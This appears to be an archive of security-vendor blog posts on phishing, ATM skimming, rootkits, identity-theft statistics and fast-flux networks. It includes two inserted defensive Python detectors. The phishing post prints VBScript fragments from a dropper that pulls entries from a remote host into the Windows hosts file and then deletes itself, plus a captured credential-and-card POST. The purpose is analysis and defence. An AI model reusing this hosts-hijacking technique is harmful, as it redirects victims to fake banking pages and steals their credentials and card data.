Finally, please note that via its ScriptScan module, McAfee VirusScan blocks and detects the PHP script as JS/Exploit-BO.gen. Moreover, the “invisible” files :-) are detected as Downloader-BDH.

Phishing is Still Alive and Kicking

A few days ago McAfee Avert Labs came across yet another example of how effective and especially dangerous phishing can be. We received a sample in the form of an .exe file that when executed would start Internet Explorer and present the login page of a well-known Italian bank.

At first sight, for the inexperienced and security-unaware user, the Web site looked exactly like the real thing. There were no obvious signs of fraud, as “only” the user name and password to get into the banking page were requested. Once these initial credentials were entered, a second page requested a card number, the expiration date, and the CVV2/CVC2 number. After this, you guessed it, a simple message–”Wrong details, try again!”

What actually happens is that the sample creates the file finaltemp.vbs and runs it immediately via the Windows Script Host, wscript.exe. The VBS script is removed from the system as soon as it has run. Here are some interesting snippets of the code embedded in the executable:

Set WshShell = WScript.CreateObject("WScript.Shell")
strURL = "http://x.x.x.x/twiki/b.txt"   ' remote file holding the hosts entries to inject
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")

More code creates the objects used to fetch b.txt over HTTP with Microsoft.XmlHttp and write its contents to a local file.

fileToCopy = fso.GetSpecialFolder(WindowsFolder).Path & "\system32\drivers\etc\hosts"

This copies the content of b.txt, fetched above, into the hosts file, compromising name resolution for every name it lists!

WshShell.Run "iexplore.exe"
Set aFile = fso.GetFile(strOutFile)
aFile.Delete

This runs Internet Explorer, which opens the bank’s main page with what looks like the correct address in the browser’s address bar; that name, however, now resolves to the bad IP set in the modified hosts file. At this stage the unaware user enters his or her information on the page, and it is sent to a remote location that is certainly not the bank’s secure environment. All of this happens silently, without any cmd shells popping up, ActiveX complaints from IE, or any other suspicious activity.
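How the hosts-file trick is caught, as an added example that is not part of the original post: a Python check that parses a hosts file and reports any watchlist domain mapped to an address other than loopback, which is what the VBS script above leaves behind. The sample hosts content, the watchlist and the attacker address 198.51.100.23 (a documentation-range address standing in for the real one, which is not reproduced here) are constructed; only poste.it comes from the capture in this post.

```python
"""Audit a hosts file for entries that hijack name resolution.  Added example,
not code from the original post.  The sample hosts content, the watchlist and
the address 198.51.100.23 are constructed for the example."""
import ipaddress
import os
import sys

# Domains whose resolution must never be overridden locally (constructed list;
# a real deployment would carry the banks and services the user actually uses).
WATCHLIST = {"poste.it", "www.poste.it"}


def hosts_path():
    """Location of the hosts file on the running platform."""
    if sys.platform.startswith("win"):
        root = os.environ.get("SystemRoot", r"C:\Windows")
        return os.path.join(root, "System32", "drivers", "etc", "hosts")
    return "/etc/hosts"


def parse_hosts(text):
    """Yield (ip_address, hostname) pairs from hosts-file text, ignoring comments."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) < 2:
            continue
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # malformed address: skip rather than abort the audit
        for name in parts[1:]:
            yield ip, name.lower()


def find_hijacks(text, watchlist=WATCHLIST):
    """Return {hostname: ip} for watchlist names mapped to a non-loopback IP.

    A mapping to 127.0.0.1 or ::1 is the usual legitimate blocking technique
    and is not reported; anything else sends the browser somewhere else while
    the address bar still shows the real domain.
    """
    hijacks = {}
    for ip, name in parse_hosts(text):
        if name in watchlist and not ip.is_loopback:
            hijacks[name] = str(ip)
    return hijacks


# Constructed hosts file: a stock header, a deliberate ad block and the kind
# of line the VBS dropper appends.
SAMPLE_HOSTS = """# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
127.0.0.1       ads.example.invalid       # blocked on purpose, not a hijack
198.51.100.23   poste.it www.poste.it     # constructed: injected by the dropper
"""

if __name__ == "__main__":
    for name, ip in find_hijacks(SAMPLE_HOSTS).items():
        print(f"HIJACKED: {name} -> {ip}")
    # To audit the live machine instead of the sample:
    # with open(hosts_path(), encoding="utf-8", errors="replace") as fh:
    #     print(find_hijacks(fh.read()))
```

The check is deliberately narrow: it does not try to decide whether an address is “bad”, only whether a name you care about has been pinned to anything other than loopback, since the hosts file is consulted before DNS and a correct-looking address bar proves nothing once that file has been touched.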

If we look at a packet-sniffer trace, we can see the POST request made to the URL mentioned in the snippet above. The domain was registered through (no kidding!) Godaddy.com. We also see all the requests made to the IP that the VBS script wrote into the hosts file, including a POST containing the username, password, card number with the security code, and expiry date. (In this case you can see that the Avert Labs account with password “testing” is now officially owned.) ;-)

POST /index.php?MfcISAPICommand=ProcessCC&UsingSSL=1&login=AVERTLABS&pass=TESTING HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://X.X.X.X/index.php?MfcISAPICommand=VerifyFPP&UsingSSL=1&login=&pass=
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: poste.it
Content-Length: 165
Connection: Keep-Alive
Cache-Control: no-cache

Session=cvv2.gif&password=TESTING&ccnumber=6666666666666666&month=10&year=10&cvv=666&__EVENTTARGET=RicaricaCartaPPayPagamentoPPayEdit1%3AbtnContinua&__EVENTARGUMENT=

HTTP/1.1 200 OK
Date: Fri, 14 Mar 2008 18:00:39 GMT
Server: Apache/2.2.3 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.0-8
X-Powered-By: PHP/5.2.0-8
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1

It seems that phishing will remain a part of our daily lives. What is most alarming is the ease with which someone could change a few lines of these scripts to redirect the user to whatever site requires authentication and grab very sensitive information, which could be used to steal money as well as any other type of information.

So far the Web site hosting the modifications for the hosts file and the IP hosting the fake pages are still live and collecting data, so you can imagine how much could be gathered in just a few days or even a few hours. The reverse DNS details for the IP appear to be forged. We have contacted the owner of the IP and the bank itself to investigate further and have the fake site shut down as soon as possible. The hosts visit.geocities.com and geo.yahoo.com were involved as well, probably for tracking purposes.

Safe banking, folks!

ATM Fraud Gets Easier

Until recently most ATM skimmers had to go through the inconvenient process of extracting PINs from a video of the keypad as each PIN was entered. A camera that was blocked or discovered meant many PINs were lost. The only improvement was sometimes replacing the entire PIN pad with one that directly records every key pressed. Replacing the pad solves the video problem but requires a level of physical access that is rarely possible without being detected.

Visa certifies many ATMs against its requirements for PIN Entry Devices (PEDs). These requirements are supposed to define how to implement a PED so that no PIN can be stolen from the terminal. One of them, for example, is the use of 3DES to encrypt the PIN when it is sent to the ATM. The requirements state that the PIN must be encrypted even within the PED; but since the raw keypresses cannot be encrypted at the instant they are made, there is room for interpretation as to how soon the encryption must take place.

Despite this certification process, several terminals, such as the Ingenico i3300, have been found vulnerable by a pair of Cambridge researchers, Steven Murdoch and Saar Drimer. They discovered that in several models there were cables from the PIN pad carrying unencrypted PIN data. While the terminals were designed to detect physical tampering, the researchers found that it was not difficult to insert a paperclip that avoided detection and tapped the critical line from the PIN pad.

These devices were presumably allowed certification because the unencrypted data is considered to be within the PED, or because the data consists only of single key entries rather than a complete PIN. Neither detail makes a significant difference to an attacker. The problem is similar to a web user viewing an encrypted web site through an unencrypted web proxy: the traffic appears encrypted to the server (or to the central ATM computer), but there is still a large opening for viewing the plaintext on the user’s side.

Visa has claimed that this is not a real-world threat because it requires specialized knowledge of the terminal. What attack of this type doesn’t? Attackers already have to research in advance where to position and hide their second magnetic stripe reader and their camera. Finding out where in the case to insert the paperclip to reach the PIN wire is not a difficult additional item to research.

Awareness of identity theft and fraud is increasing in the general population. Criminals who make a living from large databases of ATM and credit card numbers are always looking for new ways to steal that information. This new vulnerability will allow fraudsters to gather data on even the most paranoid individuals.

The Release of Sage 3 - The Globalization of Malware

Today at Avert Labs, we released the third edition of Sage - our security journal. As always, we strive to be a bit different with our content in Sage. A little provocative, new trends, new ideas… And this issue is no different.

In this issue we look at the growing trend of localization in malware and threats. Cybercriminals are increasingly crafting attacks in multiple languages and are exploiting popular local applications to maximize their profits. Cybercrooks have become extremely deft at learning the nuances of the local regions and creating malware specific to each country. They’re not just skilled at computer programming—they’re skilled at psychology and linguistics, too.

We examined global malware trends in this report, titled “One Internet, Many Worlds.” The report is based on data compiled by our international security experts and examines the globalization of threats and the unique threats in different countries and regions. In the report, we detail the following trends and conclusions:

• Sophisticated malware authors have increased country-, language-, company-, and software-specific attacks
• Cyberattackers are increasingly attuned to cultural differences and tailor social engineering attacks accordingly
• Cybercrime rings recruit malware writers in countries with high unemployment and high levels of education such as Russia and China
• Cybercriminals take advantage of countries where law enforcement is lax
• Around the world, malware authors are exploiting the viral nature of Web 2.0 and peer-to-peer networks
• More exploits than ever before are targeted at locally popular software and applications

Download Sage 3

Identity Theft is still a top concern

Each year I eagerly await the annual Federal Trade Commission report on Consumer Fraud and Identity Theft Complaint Data. It has been available for the last few days and confirms that, after three years of stability, the numbers are moving again.

For the first time since 2004, all three complaint indicators are increasing. In 2007, the FTC received over 810,000 Consumer Sentinel complaints, when it had never taken more than 700,000 in any previous year. As ever, identity theft is the main complaint category; it has reached 32%. In 2007, 64% of fraud complaints involved unscrupulous companies initially contacting consumers over the Internet. This percentage has grown year after year: it was 60% in 2006 and 55% in 2005. E-mail is the most frequent method of contact.

Consumers reported fraud losses totaling more than $1.2 billion; the median monetary loss per person was $349, the report states.

With this report, the FTC released its top 20 complaint list, as follows:

Rank  Category                                          Complaints   %
  1   Identity Theft                                       258,427  32
  2   Shop-at-Home/Catalog Sales                            62,811   8
  3   Internet Services                                     42,266   5
  4   Foreign Money Offers                                  32,868   4
  5   Prizes/Sweepstakes and Lotteries                      32,162   4
  6   Computer Equipment and Software                       27,036   3
  7   Internet Auctions                                     24,376   3
  8   Health Care Claims                                    16,097   2
  9   Travel, Vacations, and Timeshares                     14,903   2
 10   Advance-Fee Loans and Credit Protection/Repair        14,342   2
 11   Investments                                           13,705   2
 12   Magazines and Buyers Clubs                            12,970   2
 13   Business Opportunities and Work-at-Home Plans         11,362   1
 14   Real Estate (Not Timeshares)                           9,475   1
 15   Office Supplies and Services                           9,211   1
 16   Telephone Services                                     8,155   1
 17   Employ. Agencies/Job Counsel/Overseas Work             5,932   1
 18   Debt Management/Credit Counseling                      3,442  <1
 19   Multi-Level Mktg./Pyramids/Chain Letters               3,092  <1
 20   Charitable Solicitations                               1,843  <1

When Is Stealing Not Theft?

Earlier today, the Nanshan District Court of Shenzhen, in southern China, sentenced 11 members of a password-theft syndicate to between six months and one year of imprisonment.

According to the official press, the syndicate led by Jin has been operating from three malware development bases in northern China, each employing exploit developers, Web site hijackers, command-and-control operators, and other teams to support the ultimate goal of stealing passwords for the Tencent QQ instant messaging network.

The malware “workers” are reportedly paid a commission of 0.5 cents RMB (renminbi, or yuan) per stolen password, and the top performer is believed to have made as much as 7,000 RMB in a month. The stolen passwords were in turn sold to a broker, where the virtual gold, or “QQ coins”, harvested from the stolen accounts and often used for online gaming, was traded for real money. This has been a very profitable modus operandi for many virtual-gold seekers and is behind the increase in game password stealers since 2006.

For the “infringement of personal communications,” under Chinese law, each of the 11 members received between six and 12 months of imprisonment. By comparison, stealing an equivalent amount of real-world money in China carries a hefty sentence of more than five years. As Mr. Qing Feng of the Legal Affairs Office of the Chinese State Council explains, the current laws interpret the stealing of passwords and “QQ coins” as the deletion or modification of data, which does not match the legal definition of theft.

Disputes over virtual property and crimes involving virtual theft are a growing issue in both the real and virtual worlds. Barely three months ago, a Dutch teenager was arrested for stealing virtual furniture in an online game.

A self-deprecating trojan author arrested

A Japanese trojan author was arrested by the Kyoto Police on 24 January. According to the press (in Japanese), the author is a graduate student living in Osaka and is alleged to have made the so-called “Harada virus” (the Del-500 and Uploader-AH trojans).

McAfee Avert Labs has identified more than 70 variants of this trojan family, which have been distributed for years on the Japanese P2P network Winny. Once a user downloads and runs one of the files, the trojan attempts to delete any potentially pirated content, such as movie, picture and audio files, that might have been downloaded from the P2P network.

The earlier variants show a picture of an unidentified man, the so-called “Harada”, upon infection, along with messages criticizing the illegal use of the P2P application for exchanging pirated content. The suspect followed that fashion and teased P2P users, but this time he used a famous animation picture instead. Ironically, as a result he was arrested on suspicion of violating copyright law, because the trojan he made displayed the copyrighted work without permission. (Unfortunately, there are no laws in Japan to punish malware writers at this time.)

We do not yet know how far the suspect went in creating the successive trojan variants. Those suspected to have been made by him have the same structure as the others in the family: they are written in VB and carry the contact information of “Harada” at the end of the trojan files.

Anyway, hopefully this will give rise to a discussion on creating laws to punish malware writers in Japan.

No seriously, identity theft is real.

Generally, I think we can agree that creating FUD is a bad thing. And conversely, dispelling FUD is generally a good thing. But knowing when something is actually FUD, rather than a fear based on valid concerns is kind of a vital part of that equation.

This was a lesson learned the hard way by TV presenter Jeremy Clarkson, when he published details of his bank account in the Sun newspaper. He had figured that all anyone could do with the information was put money into his account.

Not so!

He awoke one morning to find someone had set up a £500 direct debit to the charity Diabetes UK. He’s sounding quite contrite now, and seems rather adamant about pursuing those who lose the confidential information of others:

“Contrary to what I said at the time, we must go after the idiots who lost the discs and stick cocktail sticks in their eyes until they beg for mercy.”

The Russian Business Network is on tenterhooks

It’s not a secret anymore: the criminal organizations behind a large part of Internet-related fraud are huge and well organized. In the last quarter of 2007, two studies about RBN (Russian Business Network), one of the best-known criminal organizations so far, were published. Last year, I looked at them with great interest. The first, named Uncovering Online Fraud Rings: The Russian Business Network, is available as a webcast recording on the Verisign web site. The second was written by David Bizeul and is named Russian Business Network study.

These papers demonstrate and illustrate that RBN is an empire. It directly or indirectly manages potentially a million sites. Thanks to elaborate intrusive advertising techniques, millions of Internet users visit its fake retail sites every month. Hackers and other cybercriminals also have their stores and outlets there: malware sales, service offers and booby-trapped sites. Pornography and pedophilia always make money there.

In addition to these documents, some particularly thorough stories have been circulating on the Net (papers from Brian Krebs, Washington post and posts on the RBNexploit and Dancho Danchev blogs).

Mailing addresses, name and photos of suspects, detailed lists of machines and autonomous systems as well as many other details were revealed. Because of this, the group has deemed it best to partially disappear. On November 6th, 2007, many network nodes stopped responding. It was not the end of them though; the business has been carefully planned: high-activity sites – those leading the attacks at the time – were not disturbed. Gradually, the affected sites began to re-appear in Russia as well as all over the world. Today, many countries in Southeast Asia are mentioned, but they are not alone. The reorganization is on the move: new retail payment systems for fake products (mainly fake security products and fake video codecs), new legitimate sites hosting tricky banner ads redirecting computers to these fake retail web sites, new Storm (aka Nuwar) worm campaigns achieved by new C&C botnet implementations, new web sites hosting malicious software (like MPack or WebAttacker) and secretly reached after the victims encounter a hidden iFrame during Internet surfing.

People tracking down RBN regularly watch its Autonomous Systems (AS). These are collections of connected IP networks controlled by a single entity and defined by an AS number. The RBNexploit blog and the David Bizeul document are very comprehensive on this subject and various network maps or tables help the reader to understand the complexity of such an organization.

One puzzle piece is known as AS40989. Despite the fact it was not the core center of the RBN activity it is well-known because it seems to be the official name of the group. It is the subject of a new write-up available at the Shadowserver Foundation web site.

This document analyzes the malicious binary activity directed to and commanded by AS40989. From March to November 2007 the researchers collected 2859 pieces of malware which initiated HTTP connections to it. They found an impressive collection of malware: “Gozi, Goldun, Hupigon, Nurech, Nuklus, Pinch, Sinowal, Tibs, Xorpix, various dialers, downloaders, worms, adware, page hijackers, and proxies”. Once again, it demonstrates the professionalism and the size of the group.

Reading material on RBN is abundant. With this post, I only wish to draw your attention to this existing material. It demonstrates the vitality of the new criminal organizations; it also demonstrates that many people, at McAfee and elsewhere, stay tuned to the dark side of the Internet to understand how the situation is constantly changing and to fight this threat at a worldwide level.

Data in your pocket

In the early days, security concerns around computer hardware and the data on it were addressed mainly by good physical security: lock the systems in a room with restricted access and both the systems and the data were mostly safe. Stealing the data meant physically breaking into that area, which is hard. Then networking changed how we looked at computers: data became reachable even when it sat on a remote system. That was a major leap for computing, but it also changed the security picture. Admins became less concerned with physical security and more concerned with protecting data from theft through the interconnection of these systems; there was a big paradigm shift from physical to network security. History is now almost repeating itself, though this time it is tougher: physical security is regaining importance without network security becoming any less of a concern.

As devices shrink and things not traditionally seen as computers, such as mobile phones and other storage-capable devices, become more popular, the physical security of those devices matters again. A mobile phone today can easily hold 2 to 8 GB of data or more: business-critical e-mail, identity and credit card information, or family pictures. Because the devices are small, they are easily lost, stolen or pilfered. Most of them run operating systems sophisticated enough, often with Wi-Fi and Bluetooth, that the usual application and network issues apply to them as well. And it is not only handhelds: even traditional equipment is more exposed to physical attack these days, because most of the attention goes to defending against network and application attacks.

We cannot easily go back to the early days of strongly locked server rooms when the device is in someone’s pocket! Good user education and software protections have to be applied to make it less likely that the data falls into the wrong hands. These devices may even need tracking systems, in addition to data protection, to safeguard the device itself as well as its data.

- Tracking systems that can provide the location of the device, such as GPS or tracking through the mobile service provider, may need to be implemented for any mobile device carrying sensitive data.
- Only required data should be kept on these devices. Keep moving important but less-used data onto a more secure system, and back it up!
- The data should always be kept locked behind strong passwords.
- The most critical and important data should also be kept encrypted.
- Use data-theft prevention software that performs data wiping (“eradicate it before it falls into enemy hands”): software that wipes the data when some event signals that the hardware is in the wrong hands.
- Unless required, keep all connectivity such as Wi-Fi and Bluetooth turned off on such handhelds.

Data that can roam with us in our pockets is less physically secure, but good user education and software can at least keep it from getting misused, if not able to prevent it from getting lost.

A banner year for malware, digital threats and the security industry

On January 2, 2007, we posted the first DAT files (4930) of the new year. On that day, the public count of threats detected stood at 221,935. Fast-forward to December 31, when we released the last DAT (5196) of 2007, and the public count of threats detected finished at an almost unbelievable 357,820.

That’s a total of 135,885 unique threats that we at Avert Labs identified throughout 2007. But let me put that into further context:

• 372 new detections per calendar day in 2007

• 527 new detections per business day in 2007

• One driver written every 4 minutes in 2007

• 38% of all detections were added this year.

• 25,438 more detections were added this year than in 2005 and 2006 combined. (Those two years totaled 110,447.)

Scary numbers any way you break them down. One could almost say that malware creation has reached epidemic proportions. As many who read this blog already know, the number of sample files we receive per day to analyze is increasing in record numbers–some days, we can get upwards of 2,000 samples per hour from various sources. We are seeing more malware than ever before, even though the lifespan of most malware is decreasing! The average lifespan of malware with criminal intent may only be 5 to 7 hours. Most of it is static and obfuscated. Much of it is stealthy. Never forget that it is almost completely financially motivated these days. Just think of where Pablo Escobar, Al Capone, or even Tony Montana would sink their money today–into malware.

Data security and the security industry itself have seen many changes throughout 2007. Technologies such as virtualization and RFID will have an enormous impact on data security, posing new challenges (and some of the same old ones) to the industry as we move forward to secure these new vectors.

Couriers: “You are the weakest link!”

’Tis the season to be greedy – at least that’s what a couple of New York City thieves thought the other night when they stole an entire 18-wheeler FedEx truck containing somewhere around $1M in valuables. What might go overlooked is the priceless corporate data that could also have been on that truck. We constantly rely on couriers such as FedEx to securely ship all of our “data at rest-in transport”, but what measures are they taking to actually ensure those assumptions hold? If the breach blog has taught us anything, it’s that not enough companies are encrypting their laptop hard drives, backup tapes, etc., and these types of attacks are still serious risks to our data.

As a security consultant, I repeatedly see and hear about these things going overlooked. From boxes labeled “Iron Mountain” sitting on empty loading docks to Dell boxes waiting in the vacant hallways of shared office buildings, companies are constantly putting their data at risk at pickup and drop-off areas. And I’m actually surprised we don’t see this more often, now that even not-so-technical thieves can cash in on the action with these physical attacks. So what do we do? Require all couriers to upgrade to armored cars? Or maybe just spend the time and money now to upgrade your security policy and encrypt all data that leaves your control!

Rootkits in China Part 1

The term “rootkit” was originally used to refer to toolkits used by root privileged users. This definition has evolved over time. Nowadays, the term rootkit refers to backdoor programs that run with elevated privileges and that are designed to evade detection by users, administrators and rootkit detection software. Rootkits first appeared in China in 2001 and have evolved substantially since then.

These days most rootkits are installed through exploitation of web browser vulnerabilities or by viruses and worms. In some cases, rootkits are bundled with images that exploit image library flaws to gain access to systems. In other cases, exploits for previously unknown vulnerabilities (zero-day) are placed on web sites and used to hack browsers and install rootkits. For example, exploits for the zero-day vulnerability identified by CVE-2007-0038 were found on many Chinese websites several months before a patch was released. In other cases, popular websites and public forums are hacked. Their content is then modified to include exploits that install rootkits onto user systems. Often, attackers exploit script injection vulnerabilities to gain access to these web sites. They then upload exploits for known issues like MS06-001, MS06-014, MS06-055, MS07-017, the Baofeng ActiveX vulnerability, the RealPlayer ActiveX vulnerability and so on. In China, many rootkits also spread via malware that targets a popular IM client named QQ. Once a QQ user’s machine has been compromised by a rootkit, it will send messages containing links to malicious websites to all of the friends of the affected QQ user. If these users click the links, they too will be targeted. This method of propagation is widespread and difficult to defend against. Another technique used to spread rootkits is the addition of malicious programs to pirated software like Windows, Photoshop, Office, etc. People who download and install these pirated programs are infected by the rootkits bundled with them. Since pirated software is popular in China, many machines are infected this way.

Stay tuned for Part 2…


Be careful of Real Media files downloaded from the Internet

Recently, I had some friends complain about problems with Real Media files (*.rm/*.rmvb). According to them, after downloading and playing rmvb files, the Real Media Player launched a malicious webpage without prompting. Later, they noticed their OS running noticeably slower. And later still, they found their IM account passwords modified and online gaming accounts stolen.

It appears that the media files they downloaded were created by a hacker and designed to open malicious webpages. I investigated this and found it is quite easy to add a malicious webpage to rmvb files. The hacker used freely available software. These programs include applications which can be used to add events to rmvb files. A time and URL is specified in a text file, then imported into the rmvb file using these programs, and that’s it! When the rmvb file is opened in RealPlayer, the URL will automatically be opened after the specified time has elapsed. My advice was to scan any downloaded media files with antivirus software before playing them. Another option is to use a player other than RealPlayer.

Hope you can enjoy Real Media without the malicious webpages!!!

From Fast-Flux to RockPhish - Part 2

Last Friday, I started some analysis of fast-flux techniques. I stopped my discussion at single-flux, so today I will improve on the camouflage! To do this, the fake site’s IP addresses vary, and so do the IP addresses of the name servers that define them in the DNS architecture. This is double-flux.

Here, the criminal has a genuine control and monitoring workstation. The bots are no longer just relaying HTTP traffic; they also simulate the domain name servers and hand out the various IP addresses for the connection, which, as before, are valid only for a moment.

When the victim tries to reach the site he would like to visit, a request is sent to the name server with authority over the zone. Just as with single-flux, the short lifespan of the address leads the name server request to the criminal network. Used first at this level, the fast-flux technique causes the request to be redirected to a first zombie machine inside the botnet (fast-flux on name servers: IP_A to IP_E). This machine requests the response from the C&C workstation and forwards it to the requestor using the same method a second time (fast-flux on web site: IP_1 to IP_9).

In return, the IP address of another zombie machine is sent to the victim. This second bot relays the traffic, preserving the criminal’s anonymity.

As the blurred image below suggests, this third example deals with an adult site that tries to remain discreet about its origins. Two dig commands launched a few minutes apart show us the result.

On the web site side, the expiration dates are reduced to 10 minutes (600 seconds), and the site’s IP addresses are very varied (fast-flux on web site). It’s the same for the domain name servers, which changed within a short period of time (fast-flux on name servers).

Combining the three previous methods gives a major headache :-). But as a result, we obtain the scheme used in the mysterious RockPhish structures. The ingredients are:

  • lots of domain names,
  • a fast-flux botnet network in double-flux mode,
  • specialized software that is responsible for sending out phishing e-mails, where each recipient is assigned an index. This is used as a parameter in the URL, and again within the mirror site as long as the victim gets connected.

I won’t bore you with the final overview diagram of the network traffic. Simply seeing the URLs below, collected from phishing e-mails, gives you an idea of the complexity of the attack.

The host domain name varies, as do the domain name servers. The control and monitoring workstation manages the structure of the network in real time. Let’s not forget that this is primarily a network of compromised machines (a botnet). The index is there to ensure proper redirection according to victims, banks, machines to be activated, and the group of fraudsters profiting from the attack.

I hope this dissection interested you. It demonstrates that attacks are more and more sophisticated. To be sure, groups like the ones using RockPhish with so much energy to improve their network resilience and stealth are doing so because it is very profitable for them.

From Fast-Flux to RockPhish - Part 1

For several years, we have been talking about the sophistication of attacks. The main goals are discretion, camouflage and profitability. Some of the common techniques and tools are named Fast-Flux, RockPhish or MPack. As I recently worked on some spam campaigns and dubious websites, I will use them as examples and explain some of these new cybercriminal methods in a set of two blog contributions.

Before complicating the scheme, let me start with a very simple example:

Here, a spammer owns a lot of domain names. He constantly buys new ones using stolen credit card numbers and rotates through them as they get shut down, which can happen very quickly or slowly, depending upon the vigilance and honesty of the access providers.

One machine contains his site. It may be dedicated to selling medicine or counterfeit luxury products. In order to trick anti-spam software, e-mails are personalized with background noise and random text. For more diversification, and due to the many domain names he has, his software changes the URL of his site for the various messages it sends.

When a victim tries to follow the link provided for them, a process makes a request to the local name server for the IP address of the machine corresponding to the URL they were sent:

If the information exists at this level (a cache mechanism), it is forwarded directly to the requester. Otherwise, and if the link is still valid, the desired IP address is returned only after checking root and/or primary servers. Dozens of different domain names could point to a single machine.

Here is an example of a result that could be obtained using this method:

With phishing, the methods are becoming more complex. This curve, drawn from APWG statistics, does not show the number of victims, which has increased a lot this year.

It shows that, since mid-2006, the total number of incidents (with and without a victim) has remained stable. What’s interesting are the peaks in November 2006 and particularly in April 2007. The question is: how can we have three times more phishing sites than identified attacks? The answer is called RockPhish.

To understand it better, we will expand upon the previous example and look at the intermediate single-flux and double-flux methods.

In single-flux, the criminal has just one domain. Thanks to an unscrupulous access provider, he runs his own domain name server. The criminal also has a network of compromised machines available to him, which he uses as a relay platform between the victims and his site. Very short DNS expiry times, combined with a round-robin over many zombie machine IP addresses, let him continually change the apparent address used to reach the mirror site.

The latter is therefore even better protected.

When the victim tries to reach the mirror site, a request is sent to the name server with authority over the zone.

The lifespan of the address being no more than a few minutes, there is generally no cached solution. The criminal’s name server is therefore checked. The IP address of one of the bots is sent back to the victim. During the several minutes of the transaction, it will relay the traffic and then disappear, making it more difficult to locate and therefore neutralize key sites.

Here is an example of an online casino site using the single-flux technique:

My Windows version of dig (Domain Information Groper) shows some distinctive network features: the expiration times here are very short, and the IP addresses are very varied. This is the mark of camouflage using the single-flux technique.

The next post will show how double-flux works and, after that, a RockPhish network.
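The single-flux and double-flux signatures described in this post and in Part 2 above (very short TTLs, many unrelated addresses replaced between lookups, and name-server glue addresses that change too) can be scored from successive dig answers. This is an added example, not code from the original posts; the domains, addresses and thresholds below are constructed.

```python
"""Heuristic single-/double-flux scoring over successive DNS lookups.

Added example, not code from the original posts. It scores the features the
posts single out: very short TTLs, many unrelated A records that are replaced
between lookups made a few minutes apart, and name-server glue addresses that
change as well (double-flux). Input lines are dig-style answer lines; every
name, address and threshold below is constructed.
"""
from __future__ import annotations

import ipaddress
import re
from dataclasses import dataclass

# dig answer-section line:  owner  ttl  class  type  rdata
_LINE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+(A|NS)\s+(\S+)$")


@dataclass(frozen=True)
class Record:
    owner: str
    ttl: int
    rtype: str
    rdata: str


def parse_answers(text: str) -> list[Record]:
    """Parse dig-style A/NS lines; anything else (comments, SOA, ...) is skipped."""
    out = []
    for raw in text.splitlines():
        m = _LINE.match(raw.strip())
        if m:
            out.append(Record(m.group(1).lower(), int(m.group(2)),
                              m.group(3), m.group(4).lower()))
    return out


def _ip_sets(records: list[Record], zone: str) -> tuple[set[str], set[str]]:
    """Site A records (owner == zone) versus glue A records of the zone's NS."""
    ns_names = {r.rdata for r in records if r.rtype == "NS" and r.owner == zone}
    site = {r.rdata for r in records if r.rtype == "A" and r.owner == zone}
    glue = {r.rdata for r in records if r.rtype == "A" and r.owner in ns_names}
    return site, glue


def _churn(old: set[str], new: set[str]) -> float:
    """Share of the combined address set that is not common to both lookups."""
    union = old | new
    return 0.0 if not union else 1.0 - len(old & new) / len(union)


def flux_report(zone: str, snapshots: list[str]) -> dict:
    """Score successive lookups of `zone` and classify them."""
    zone = zone.lower().rstrip(".") + "."
    pairs = [_ip_sets(parse_answers(s), zone) for s in snapshots]
    site_sets = [site for site, _ in pairs]
    glue_sets = [glue for _, glue in pairs]
    ttls = [r.ttl for s in snapshots for r in parse_answers(s)
            if r.rtype == "A" and r.owner == zone]
    all_site = set().union(*site_sets)
    # /16 diversity as a cheap stand-in for "addresses in unrelated networks"
    prefixes = {str(ipaddress.ip_network(f"{ip}/16", strict=False)) for ip in all_site}
    site_churn = max((_churn(a, b) for a, b in zip(site_sets, site_sets[1:])), default=0.0)
    glue_churn = max((_churn(a, b) for a, b in zip(glue_sets, glue_sets[1:])), default=0.0)

    short_ttl = bool(ttls) and min(ttls) <= 600          # ten minutes or less
    spread = len(all_site) >= 3 and len(prefixes) >= 2   # several IPs, several networks
    verdict = "none"
    if short_ttl and spread and site_churn >= 0.5:
        verdict = "double-flux" if glue_churn >= 0.5 else "single-flux"
    return {"min_a_ttl": min(ttls) if ttls else None, "distinct_site_ips": len(all_site),
            "distinct_prefixes": len(prefixes), "site_churn": site_churn,
            "glue_churn": glue_churn, "verdict": verdict}


# Constructed lookups of a flux domain, taken a few minutes apart.
_NS = ("casino-example.test.  3600 IN NS ns1.casino-example.test.\n"
       "casino-example.test.  3600 IN NS ns2.casino-example.test.\n")
FLUX_FIRST = _NS + """
casino-example.test.   300 IN A  203.0.113.10
casino-example.test.   300 IN A  198.51.100.77
casino-example.test.   300 IN A  192.0.2.200
ns1.casino-example.test. 600 IN A 198.51.100.5
ns2.casino-example.test. 600 IN A 203.0.113.5
"""
_SECOND_SITE = _NS + """
casino-example.test.   300 IN A  192.0.2.31
casino-example.test.   300 IN A  198.51.100.140
casino-example.test.   300 IN A  203.0.113.64
"""
# Site addresses replaced, name-server glue unchanged: single-flux.
SINGLE_FLUX = [FLUX_FIRST, _SECOND_SITE
               + "ns1.casino-example.test. 600 IN A 198.51.100.5\n"
               + "ns2.casino-example.test. 600 IN A 203.0.113.5\n"]
# Site addresses and name-server glue both replaced: double-flux.
DOUBLE_FLUX = [FLUX_FIRST, _SECOND_SITE
               + "ns1.casino-example.test. 600 IN A 192.0.2.9\n"
               + "ns2.casino-example.test. 600 IN A 198.51.100.201\n"]
# A conventionally hosted site: one stable address, day-long TTL.
STABLE = ["shop-example.test. 86400 IN A 203.0.113.40\n"] * 2

if __name__ == "__main__":
    print("stable :", flux_report("shop-example.test", STABLE)["verdict"])
    print("single :", flux_report("casino-example.test", SINGLE_FLUX)["verdict"])
    print("double :", flux_report("casino-example.test", DOUBLE_FLUX)["verdict"])
```

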